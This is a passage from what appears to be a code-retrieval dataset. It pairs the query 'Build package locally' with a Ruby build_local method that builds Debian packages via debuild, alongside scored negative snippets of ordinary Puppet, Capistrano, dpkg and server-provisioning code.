\"-Xmx1024m\"\n\n ####new_contents = new_contents1.gsub(/-Xms256m/, jvm_max_size )\n ####new_contents1 = new_contents.gsub(/-Xmx256m/, jvm_max_size )\n\n\n new_contents = new_contents1.gsub(\"-server -Xms512m -Xmx512m\", \"-server -Xms2048m -Xmx2048m\" )\n new_contents1 = new_contents.gsub(\"-server -Xms256m -Xmx256m\", \"-server -Xms1024m -Xmx1024m\" )\n\n Puppet.debug(\" update_setEnv_scripts updating ADMINSERVER_HOSTNAME : #{file_name} \")\n oldstr=\"ADMINSERVER_HOSTNAME=\" + get_value4key(\"appserverhost\", resource[:webdomain_attrib])\n newstr=\"ADMINSERVER_HOSTNAME=\" + get_value4key(\"webadminserverhost\", resource[:webadmin_server_attrib] )\n\n new_contents2 = new_contents1.gsub(oldstr, newstr )\n\n\n new_contents = new_contents2.gsub(/-XX:MaxPermSize=128m/, \"-XX:MaxPermSize=256m\" )\n File.open(file_name, \"w\") {|file| file.puts new_contents }\n Puppet.alert(\" end : update_setEnv_scripts \")\n end",
"def dpkg_commit_changes(patch_name, directory = Dir.pwd)\n Dir.chdir(directory) do\n Packager.info (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n `dpkg-source --commit . #{patch_name}`\n end\n end",
"def set_initial_path\n `echo $PATH`.split(':').each do |path|\n add_env_path path\n end\nend",
"def restore_spec_configuration\n ActiveFedora.init(:fedora_config_path=>File.join(File.dirname(__FILE__), \"..\", \"config\", \"fedora.yml\"))\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def backup_config_file\n File.join(source_directory,'installer','rails_installer_defaults.yml')\n end",
"def pre_update_extension volume_root, options\n if !File.exist? (mach_kernel = File.join(volume_root, \"mach_kernel\")) and (options[:mach_kernel] or !options[:extensions][:up_to_date])\n IESD::Packages::BaseSystemBinaries.new(File.join(volume_root, PACKAGES, \"BaseSystemBinaries.pkg\")).extract_mach_kernel mach_kernel\n system(\"/usr/bin/env\", \"chflags\", \"hidden\", mach_kernel)\n end\n end",
"def debian_version\n IO.read('/etc/debian_version').strip.split('.')\n end",
"def system_update(&block)\n ssh.exec! \"apt-get --assume-yes update\", sudo: true\n ssh.exec \"apt-get --assume-yes upgrade\", sudo: true do |ch, stream, data, cmd|\n yield data\n end\n end",
"def copy_stage_config\n run \"if [ -f #{release_path}/config/stage_configs/#{stage}.rb ]; then cp #{release_path}/config/stage_configs/#{stage}.rb #{release_path}/config/environments/stage.rb; fi\"\n end",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def docker_postinstall_sf2(containername, framework, port)\n # change base domain\n system \"perl -pi -e 's/base_hostname:.*$/base_hostname: \\'#{@@docker_ip}:#{port}\\'/' app/config/parameters.yml\"\n system \"perl -pi -e 's/base_domain:.*$/base_domain: \\'#{@@docker_ip}:#{port}\\'/' app/config/parameters.yml\"\n\n docroot = Dir.pwd\n\n # get last container version\n system \"docker pull nextdeploy/#{framework}console\"\n\n # Ensure that the first composer has finish before launch symfony commands\n until File.exists?(\"app/bootstrap.php.cache\") || File.exists?(\"var/bootstrap.php.cache\") do\n puts \"Waiting composer finished his work .....\"\n sleep 5\n end\n\n puts \"Install symfony website\"\n # install and configure doctrine database\n system \"docker run --net=#{@projectname}_default -v=#{docroot}:/var/www/html nextdeploy/#{framework}console assets:install --symlink\"\n end",
"def update!(**args)\n @apt = args[:apt] if args.key?(:apt)\n @deb = args[:deb] if args.key?(:deb)\n @desired_state = args[:desired_state] if args.key?(:desired_state)\n @googet = args[:googet] if args.key?(:googet)\n @msi = args[:msi] if args.key?(:msi)\n @rpm = args[:rpm] if args.key?(:rpm)\n @yum = args[:yum] if args.key?(:yum)\n @zypper = args[:zypper] if args.key?(:zypper)\n end",
"def update(&block)\n ssh.exec! \"apt-get --assume-yes update\", sudo: true\n ssh.exec \"apt-get --assume-yes upgrade\", sudo: true do |ch, stream, data, cmd|\n yield data\n end\n end",
"def update\n # Install in pacman can be used for update, too\n self.install\n end",
"def update\n # Install in pacman can be used for update, too\n self.install\n end",
"def install\n copy_envrc\n copy_database_yml\n copy_docker_db_setup_sh\n system(`direnv allow`)\n print(\"#{readme}\\n\")\n end",
"def braid_update_config\n bundle_exec('braid setup 2>&1 > /dev/null', false)\n bundle_exec('braid upgrade-config') if 0 == $?.exitstatus\n end",
"def get_install_client\n purge\n s('cd /tmp')\n s('wget https://apt.puppetlabs.com/puppetlabs-release-trusty.deb')\n s('sudo apt-get update')\n s('sudo apt-get -y install puppet')\nend",
"def run_stage_one \n\t# directory tools is needed by stage on, be sure it does not exist yet\n\tif File.exists?(\"/tools\")\n\t\tputs sprintf(\"%015.4f\", Time.now.to_f) + \" error > EXIT! Directory or softlink /tools already exists\"\n\t\tputs sprintf(\"%015.4f\", Time.now.to_f) + \" error > Too risky for me to continue. Remove /tools, then\"\n\t\tputs sprintf(\"%015.4f\", Time.now.to_f) + \" error > try again.\"\n\t\t$stdout.flush\n\t\traise \"SoftlinkAlreadyThere\"\n\tend\n\t# File.symlink(@builddir + \"/stage01/chroot/tools\", \"/tools\")\n\tsystem(\"mkdir /tools\")\n\tsystem(\"mkdir -p \" + @builddir + \"/stage01/chroot/tools\")\n\tsystem(\"mount -o bind \" + @builddir + \"/stage01/chroot/tools /tools\")\n\t[ \"/stage01\", \"/stage01/build\",\"/stage01/chroot\",\"/stage01/chroot/tools\", \"/tmp\" ].each { |d|\n\t\tunless File.exists?(@builddir + d)\n\t\t\tDir.mkdir(@builddir + d)\n\t\tend\n\t}\n\t# Stage 01 abfrühstücken\n\t# Alle Scripte in stage01 suchen\n\tstage_one_objs = get_stage_one_objs\n\t# Download first\n\tstage_one_objs.each { |i| i.download }\n\t# Unpack\n\tstage_one_objs.each { |i|\n\t\ti.unpack\n\t\t### Dir.chdir(@workdir)\n\t\ti.patch(@log_each)\n\t\t### Dir.chdir(@workdir)\n\t\ti.build(@log_each)\n\t\t### Dir.chdir(@workdir)\n\t\ti.install(@log_each)\n\t\t### Dir.chdir(@workdir)\n\t\ti.filecheck\n\t\t### Dir.chdir(@workdir)\n\t}\n\tsystem(\"umount /tools\")\nend",
"def setup_data_dir\n changes = []\n\n case distro\n\n when RHEL\n unless pg_data_dir == pg_default_data_dir\n changes = rput( 'etc/sysconfig/pgsql/postgresql', user: :root )\n end\n\n sudo_if( \"[ ! -d '#{pg_data_dir}/base' ]\" ) do\n sudo <<-SH\n mkdir -p #{pg_data_dir}\n chown postgres:postgres #{pg_data_dir}\n chmod 700 #{pg_data_dir}\n SH\n pg_initdb\n end\n\n when Debian\n unless pg_data_dir == pg_default_data_dir\n sudo <<-SH\n if [ ! -d '#{pg_data_dir}/base' ]; then\n mkdir -p #{pg_data_dir}\n chown postgres:postgres #{pg_data_dir}\n chmod 700 #{pg_data_dir}\n mv #{pg_default_data_dir}/* #{pg_data_dir}/\n fi\n SH\n end\n else\n raise ContextError, \"Distro #{distro.class.name} not supported\"\n end\n\n changes\n end",
"def standard_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n tmp_file = \"/tmp/zone_\"+options['name']\n admin_username = options['q_struct']['admin_username'].value\n admin_uid = options['q_struct']['admin_uid'].value\n admin_gid = options['q_struct']['admin_gid'].value\n admin_crypt = options['q_struct']['admin_crypt'].value\n root_crypt = options['q_struct']['root_crypt'].value\n admin_fullname = options['q_struct']['admin_description'].value\n admin_home = options['q_struct']['admin_home'].value\n admin_shell = options['q_struct']['admin_shell'].value\n passwd_file = options['clientdir']+\"/etc/passwd\"\n shadow_file = options['clientdir']+\"/etc/shadow\"\n message = \"Checking:\\tUser \"+admin_username+\" doesn't exist\"\n command = \"cat #{passwd_file} | grep -v '#{admin_username}' > #{tmp_file}\"\n execute_command(options,message,command)\n message = \"Adding:\\tUser \"+admin_username+\" to \"+passwd_file\n admin_info = admin_username+\":x:\"+admin_uid+\":\"+admin_gid+\":\"+admin_fullname+\":\"+admin_home+\":\"+admin_shell\n command = \"echo '#{admin_info}' >> #{tmp_file} ; cat #{tmp_file} > #{passwd_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n print_contents_of_file(options,\"\",passwd_file)\n info = IO.readlines(shadow_file)\n file = File.open(tmp_file,\"w\")\n info.each do |line|\n field = line.split(\":\")\n if field[0] != \"root\" and field[0] != \"#{admin_username}\"\n file.write(line)\n end\n if field[0].to_s.match(/root/)\n field[1] = root_crypt\n copy = field.join(\":\")\n file.write(copy)\n end\n end\n output = admin_username+\":\"+admin_crypt+\":::99999:7:::\\n\"\n file.write(output)\n file.close\n message = \"Information:\\tCreating shadow file\"\n command = \"cat #{tmp_file} > #{shadow_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n print_contents_of_file(options,\"\",shadow_file)\n client_home = options['clientdir']+admin_home\n message = \"Information:\\tCreating SSH directory for \"+admin_username\n command = \"mkdir -p #{client_home}/.ssh ; cd #{options['clientdir']}/export/home ; chown -R #{admin_uid}:#{admin_gid} #{admin_username}\"\n execute_command(options,message,command)\n # Copy admin user keys\n rsa_file = admin_home+\"/.ssh/id_rsa.pub\"\n dsa_file = admin_home+\"/.ssh/id_dsa.pub\"\n key_file = client_home+\"/.ssh/authorized_keys\"\n if File.exist?(key_file)\n system(\"rm #{key_file}\")\n end\n [rsa_file,dsa_file].each do |pub_file|\n if File.exist?(pub_file)\n message = \"Information:\\tCopying SSH public key \"+pub_file+\" to \"+key_file\n command = \"cat #{pub_file} >> #{key_file}\"\n execute_command(options,message,command)\n end\n end\n message = \"Information:\\tCreating SSH directory for root\"\n command = \"mkdir -p #{options['clientdir']}/root/.ssh ; cd #{options['clientdir']} ; chown -R 0:0 root\"\n execute_command(options,message,command)\n # Copy root keys\n rsa_file = \"/root/.ssh/id_rsa.pub\"\n dsa_file = \"/root/.ssh/id_dsa.pub\"\n key_file = options['clientdir']+\"/root/.ssh/authorized_keys\"\n if File.exist?(key_file)\n system(\"rm #{key_file}\")\n end\n [rsa_file,dsa_file].each do |pub_file|\n if File.exist?(pub_file)\n message = \"Information:\\tCopying SSH public key \"+pub_file+\" to \"+key_file\n command = \"cat #{pub_file} >> #{key_file}\"\n execute_command(options,message,command)\n end\n end\n # Fix permissions\n message = \"Information:\\tFixing SSH permissions for \"+admin_username\n command = \"cd #{options['clientdir']}/export/home ; chown -R #{admin_uid}:#{admin_gid} #{admin_username}\"\n execute_command(options,message,command)\n message = \"Information:\\tFixing SSH permissions for root \"\n command = \"cd #{options['clientdir']} ; chown -R 0:0 root\"\n execute_command(options,message,command)\n # Add sudoers entry\n sudoers_file = options['clientdir']+\"/etc/sudoers\"\n message = \"Information:\\tCreating sudoers file \"+sudoers_file\n command = \"cat #{sudoers_file} |grep -v '^#includedir' > #{tmp_file} ; cat #{tmp_file} > #{sudoers_file}\"\n execute_command(options,message,command)\n message = \"Information:\\tAdding sudoers include to \"+sudoers_file\n command = \"echo '#includedir /etc/sudoers.d' >> #{sudoers_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n sudoers_dir = options['clientdir']+\"/etc/sudoers.d\"\n check_dir_exists(options,sudoers_dir)\n sudoers_file = sudoers_dir+\"/\"+admin_username\n message = \"Information:\\tCreating sudoers file \"+sudoers_file\n command = \"echo '#{admin_username} ALL=(ALL) NOPASSWD:ALL' > #{sudoers_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def update_deprecated_config\n # return # Until further notice\n return if File.exist?(default_config_file)\n\n old_file = File.join(Util.user_home, '.doingrc')\n return unless File.exist?(old_file)\n\n Doing.logger.log_now(:warn, 'Deprecated:', \"main config file location has changed to #{config_file}\")\n res = Prompt.yn(\"Move #{old_file} to new location, preserving settings?\", default_response: true)\n\n return unless res\n\n if File.exist?(default_config_file)\n res = Prompt.yn(\"#{default_config_file} already exists, overwrite it?\", default_response: false)\n\n unless res\n @config_file = old_file\n return\n end\n end\n\n FileUtils.mv old_file, default_config_file, force: true\n Doing.logger.log_now(:warn, 'Config:', \"Config file moved to #{default_config_file}\")\n Doing.logger.log_now(:warn, 'Config:', %(If ~/.doingrc exists in the future,\n it will be considered a local config and its values will override the\n default configuration.))\n Process.exit 0\n end",
"def update_cookbooks()\n self.resolver.config_dir = self.options[:config_dir] ? self.options[:config_dir] : Dir.pwd\n unless File.exists?(\"cookbooks\")\n\tKitchenplan::Log.info \"No cookbooks directory found. Running #{self.resolver.name} to download necessary cookbooks.\"\n\tself.platform.normaldo self.resolver.fetch_dependencies()\n end\n if self.options[:update_cookbooks]\n\tKitchenplan::Log.info \"Updating cookbooks with #{self.resolver.name}\"\n\tself.platform.normaldo self.resolver.update_dependencies()\n end\n end",
"def save_configuration_files(server)\n puts \"Saving config files\"\n probe(server, 'mkdir -p /root/start_stop_backup')\n probe(server, 'cp /etc/postfix/main.cf /root/start_stop_backup/.')\n probe(server, 'cp /etc/syslog-ng/syslog-ng.conf /root/start_stop_backup/.')\n end",
"def patch_containers(containers)\n (containers || Array.new).each do |container|\n if container[\"image\"] =~ /.*velum.*/\n container[\"image\"] = \"sles12/velum:development\"\n container[\"volumeMounts\"] ||= Array.new\n container[\"volumeMounts\"] << {\n \"mountPath\" => \"/srv/velum\",\n \"name\" => \"velum-devel\"\n }\n container[\"env\"] ||= Array.new\n container[\"env\"].each do |env|\n env[\"value\"] = \"development\" if env[\"name\"] == \"RAILS_ENV\"\n end\n\n # Ensure the velum_production db is used, this is what the\n # salt mysql returner is configured to use\n container[\"env\"] << {\n \"name\" => \"VELUM_DB_NAME\",\n \"value\" => \"velum_production\"\n }\n end\n end\nend",
"def local_cache(basebox_name)\n cache_dir = Vagrant::Environment.new.home_path.join('cache', 'apt', basebox_name)\n # Vagrant::Environment.new.home_path\n print cache_dir\n cache_dir.mkpath unless cache_dir.exist?\n partial_dir = cache_dir.join('partial')\n partial_dir.mkdir unless partial_dir.exist?\n cache_dir\nend",
"def _save_env\n require 'yaml'\n w_var = @var.dup\n @var[:blacklist_env].each { |b| w_var.delete b } if @var[:blacklist_env]\n _open_sefile('env3.yml', 'w') { |f| YAML.dump(w_var, f) }\nend",
"def rest_of_lxc_config_file\n if File.exists?( File.join( options[:root], 'etc/init/container-detect.conf') )\n ttydir = \"lxc\"\n else\n ttydir = \"\"\n end\n\n render( \"templates/lxc_config_footer.erb\", {:ttydir => ttydir} )\n end",
"def copy_configuration_files\n replace_file 'config/routes.rb'\n replace_file 'config/environments/development.rb'\n replace_file 'config/environments/test.rb'\n copy_file 'templates/.env', '.env'\n copy_file 'templates/.tool-versions', '.tool-versions'\n replace_file 'config/initializers/dotenv.rb'\n replace_file 'config/initializers/colorize.rb'\n git add: '.'\n git commit: %Q{ -m \"Update application configuration\" }\nend",
"def stage_apt_archives(directory)\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -type d -name #{directory}\"\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -maxdepth 2 -type f\" if directory == 'main'\n command = <<-CMD\n for stuff in $(#{find_command}); do\n find $stuff -type l -delete\n codename=$(dirname ${stuff##{Pkg::Config.apt_repo_staging_path}/})\n sudo mkdir --parents #{Pkg::Config.freight_archive_path}/$codename\n sudo chown root:release -R #{Pkg::Config.freight_archive_path}/$codename\n sudo chmod g+w -R #{Pkg::Config.freight_archive_path}/$codename\n mv $stuff #{Pkg::Config.freight_archive_path}/$codename\n\n pool_directory=#{Pkg::Config.apt_repo_path}/pool/$codename/#{directory}\n if [ ! -d $pool_directory ]; then\n echo \"Can't find directory $pool_directory, it may have already been archived, skipping . . .\"\n continue\n fi\n sudo mkdir --parents /opt/tmp-apt\n sudo chown root:release -R /opt/tmp-apt\n sudo chmod g+w -R /opt/tmp-apt\n mv $pool_directory /opt/tmp-apt\n done\n CMD\n Pkg::Util::Net.remote_execute(Pkg::Config.staging_server, command)\n end",
"def update\n Puppet.debug(\"Debconf: updating #{resource[:name]}\")\n\n # Build the string to send\n args = [:package, :item, :type, :value].map { |e| resource[e] }.join(' ')\n\n IO.popen('/usr/bin/debconf-set-selections', 'w+') do |pipe|\n Puppet.debug(\"Debconf: debconf-set-selections #{args}\")\n pipe.puts(args)\n\n # Ignore remaining output from command\n pipe.close_write\n pipe.read(nil)\n end\n end",
"def prepare_master_kubeconfig(config)\n\n config.vm.provision \"shell\", inline: <<-SHELL\n mkdir -p /home/vagrant/.kube\n cp -i /etc/kubernetes/admin.conf /home/vagrant/.kube/config\n chown vagrant:vagrant /home/vagrant/.kube/config\n mkdir -p $HOME/.kube\n cp -i /etc/kubernetes/admin.conf $HOME/.kube/config\n chown $(id -u):$(id -g) $HOME/.kube/config\n SHELL\n\nend",
"def app_services_create\n # SEE http://off-the-stack.moorman.nu/posts/5-user-services-with-runit/ for info on scripts\n c = Capistrano::BaseHelper.get_capistrano_instance\n c.run(\"#{c.sudo} mkdir -p '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path)}'\")\n \n commands = []\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root /etc/sv/#{c.fetch(:user)}\"\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root /etc/sv/#{Capistrano::BaseHelper.user_app_env_path}\"\n c.run(commands.join(\" && \"))\n Capistrano::BaseHelper.generate_and_upload_config( Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_local_run), Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_remote_run), true )\n Capistrano::BaseHelper.generate_and_upload_config( Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_local_finish), Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_remote_finish), true )\n\n commands = []\n commands << \"#{c.sudo} chmod u+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"run\")}'\"\n commands << \"#{c.sudo} chmod u+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"finish\")}'\"\n commands << \"#{c.sudo} chmod g+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"run\")}'\"\n commands << \"#{c.sudo} chmod g+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"finish\")}'\"\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"run\")}'\"\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"finish\")}'\"\n c.run(commands.join(\" && \"))\n\n Capistrano::RunitBase.app_services_create_log_service\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end"
] | [
"0.721814",
"0.6581492",
"0.6412914",
"0.62594265",
"0.6220686",
"0.61962616",
"0.60835385",
"0.59578365",
"0.5928997",
"0.58600885",
"0.58563536",
"0.57297826",
"0.56680995",
"0.56155807",
"0.5538033",
"0.55320096",
"0.550211",
"0.5484689",
"0.54720473",
"0.545635",
"0.5452248",
"0.5450611",
"0.54412764",
"0.54304713",
"0.5425798",
"0.54224753",
"0.5405589",
"0.53742",
"0.53740793",
"0.53460515",
"0.5345218",
"0.53450924",
"0.5341083",
"0.53400487",
"0.5323035",
"0.5308158",
"0.53016406",
"0.5291422",
"0.52821696",
"0.5278927",
"0.526813",
"0.52628005",
"0.52596235",
"0.522185",
"0.5218981",
"0.521397",
"0.5206227",
"0.52025753",
"0.51987225",
"0.51979846",
"0.5196951",
"0.5196105",
"0.51900846",
"0.51753676",
"0.5167874",
"0.5166138",
"0.51590186",
"0.5150623",
"0.51491517",
"0.51491517",
"0.51491517",
"0.51491517",
"0.51491517",
"0.51491517",
"0.5141535",
"0.5140395",
"0.5115812",
"0.51135224",
"0.51132184",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5103755",
"0.5103448",
"0.50971204",
"0.50929415",
"0.50929415",
"0.5087071",
"0.5082359",
"0.50817937",
"0.5071656",
"0.5071072",
"0.50570107",
"0.5055169",
"0.50364393",
"0.5035288",
"0.5033211",
"0.5025072",
"0.5024756",
"0.5019291",
"0.50155944",
"0.5013834",
"0.5011602",
"0.50098526",
"0.5005557",
"0.499986"
] | 0.7720927 | 0 |
Build package locally return path to locally build file | def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)
options, unknown_options = Kernel.filter_options options,
:distributions => nil,
:parallel_build_level => nil
filepath = build_dir
# cd package_name
# tar -xf package_name_0.0.debian.tar.gz
# tar -xf package_name_0.0.orig.tar.gz
# mv debian/ package_name_0.0/
# cd package_name_0.0/
# debuild -us -uc
# #to install
# cd ..
# sudo dpkg -i package_name_0.0.deb
Packager.info "Building #{pkg_name} locally with arguments: pkg_name #{pkg_name}," \
" debian_pkg_name #{debian_pkg_name}," \
" versioned_build_dir #{versioned_build_dir}" \
" deb_filename #{deb_filename}" \
" options #{options}"
begin
FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub("/","-")) do
if File.exist? "debian"
FileUtils.rm_rf "debian"
end
if File.exist? versioned_build_dir
FileUtils.rm_rf versioned_build_dir
end
FileUtils.mkdir versioned_build_dir
debian_tar_gz = Dir.glob("*.debian.tar.gz")
debian_tar_gz.concat Dir.glob("*.debian.tar.xz")
if debian_tar_gz.empty?
raise RuntimeError, "#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}"
else
debian_tar_gz = debian_tar_gz.first
cmd = ["tar", "-xf", debian_tar_gz]
if !system(*cmd, :close_others => true)
raise RuntimeError, "Packager: '#{cmd.join(" ")}' failed"
end
end
orig_tar_gz = Dir.glob("*.orig.tar.gz")
if orig_tar_gz.empty?
raise RuntimeError, "#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}"
else
orig_tar_gz = orig_tar_gz.first
cmd = ["tar"]
cmd << "-x" << "--strip-components=1" <<
"-C" << versioned_build_dir <<
"-f" << orig_tar_gz
if !system(*cmd, :close_others => true)
raise RuntimeError, "Packager: '#{cmd.join(" ")}' failed"
end
end
FileUtils.mv 'debian', versioned_build_dir + '/'
FileUtils.chdir versioned_build_dir do
cmd = ["debuild", "-us", "-uc"]
if options[:parallel_build_level]
cmd << "-j#{options[:parallel_build_level]}"
end
if !system(*cmd, :close_others => true)
raise RuntimeError, "Packager: '#{cmd}' failed"
end
end
filepath = Dir.glob("*.deb")
if filepath.size < 1
raise RuntimeError, "No debian file generated in #{Dir.pwd}"
elsif filepath.size > 1
raise RuntimeError, "More than one debian file available in #{Dir.pwd}: #{filepath}"
else
filepath = filepath.first
end
end
rescue Exception => e
msg = "Package #{pkg_name} has not been packaged -- #{e}"
Packager.error msg
raise RuntimeError, msg
end
filepath
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def build_path\n @build_path ||= Pathname.new(source_dir).join(data['build_path'] || './build').to_s\n end",
"def build_root()\n \"#{project_root}/build\"\n end",
"def output_path\n \"build\"\n end",
"def build_path\n @build_path ||= \"#{@ant_path}/#{@config[:build_name]}\"\n end",
"def build_path\n Pathname.new(config[:build_path])\n end",
"def build_root\n Pathname.new(ENV[\"OBJDIR\"] || \"build\")\n end",
"def build_path\n Pathname.new(self.config[:build_path]) \n end",
"def build\n\t@built_gem_path ||= @helper.build_gem\nend",
"def build_script\n File.join(data_dir, 'build-script')\n end",
"def build_directory\n File.expand_path(config['build_directory'])\n end",
"def __path__\n File.join(root, 'tmp', 'build')\n end",
"def build_dir\n Rscons.application.build_dir\n end",
"def build_dir\n File.expand_path(\"#{Config.build_dir}/#{project.name}\")\n end",
"def build_target_path\n File.join(destination, configuration[:build_target_path])\n end",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def to_build_rel pn\n pn.relative_path_from(build_dir)\n end",
"def build_dir\n @build_dir ||= File.join(Crate.project.build_dir, name )\n end",
"def get_project_path\n return File.absolute_path File.join(root_dir, src)\n end",
"def component_build_path(cmp)\n File.join WORK_PATH, 'build', cmp\nend",
"def component_build_path(cmp)\n File.join WORK_PATH, 'build', cmp\nend",
"def pathDist\n\t\"../../\" + distPackageName + \"_\" + version + \"/\"\nend",
"def pack_path(name)\n path = WebpackerLite::Configuration.base_path\n file = WebpackerLite::Manifest.lookup(name)\n \"#{path}/#{file}\"\n end",
"def source_root\n FilePath.new(build_module.root, name).canonicalize\n end",
"def local_source\n @local_source ||= File.join( build_dir, File.basename( upstream_source.path ) )\n end",
"def build\n cd_and_sh( pkg_dir, build_commands )\n end",
"def stow_buildout_path\n \"#{node['stow']['path']}/stow#{pkg_delim}#{node['stow']['version']}\"\n end",
"def package_scripts_path\n \"#{Config.project_root}/package-scripts/#{name}\"\n end",
"def build_to_temp_dir\n @builder.build_project\n\n # Copy build files to temporary directory\n @task.shell.mute do\n @task.directory @project.build_path, ::File.join(@project.package_path, @package_name), :force => true\n end\n end",
"def local_path\n check_and_copy_local_file_to_rails_public\n File.join('ajaxlibs', library_name, version, file_name)\n end",
"def manifest_path\n build_output_dir.join('manifest.json')\n end",
"def pathDistSource\n\tpathDist + \"source/\"\nend",
"def bundled_path\n File.dirname Wisp::Source.bundled_path\n end",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def local_path\n src = if %i(direct repo).include?(new_resource.source)\n package_metadata[:url]\n else\n new_resource.source.to_s\n end\n ::File.join(Chef::Config[:file_cache_path], ::File.basename(src))\n end",
"def tar_path\n File.expand_path(@env[\"package.output\"], FileUtils.pwd)\n end",
"def src_path\n ENV[\"GOPATH\"]\nend",
"def target_path(target_name)\r\n File.join(package_dir, target_name)\r\n end",
"def build_dir\n Puppet::Forge::Cache.base_path + \"tmp-unpacker-#{Digest::SHA1.hexdigest(@filename.basename.to_s)}\"\n end",
"def localPath(taskName)\n self.pipeline.pipe_root + \"/build/prod/\" + taskName\n end",
"def compiled_path; end",
"def bits_full_local_path\n File.join(version_dir, BITS_FILENAME)\n end",
"def local_path\n File.join([\"Subassemblies\", \"#{self.name}.craft\"])\n end",
"def pkg_dir\n @pkg_dir ||= File.join( self.build_dir, \"#{name + ( version ? \"-#{version}\" : \"\" ) }\" )\n end",
"def generate_build_location(id)\n \"#{@config.output_dir}#{@config.prefix}/#{id}\"\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def build_output_dir\n root.join(public_dir, public_output_dir)\n end",
"def local_path\n fetch_path(DevTools.gem_root)\n end",
"def build_file\n @file = \"#{build_publish_date}-#{build_file_name}.#{build_tags}.#{build_filter}\"\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def target_dir\n without_parent_dir ? \".\" : package_name\n end",
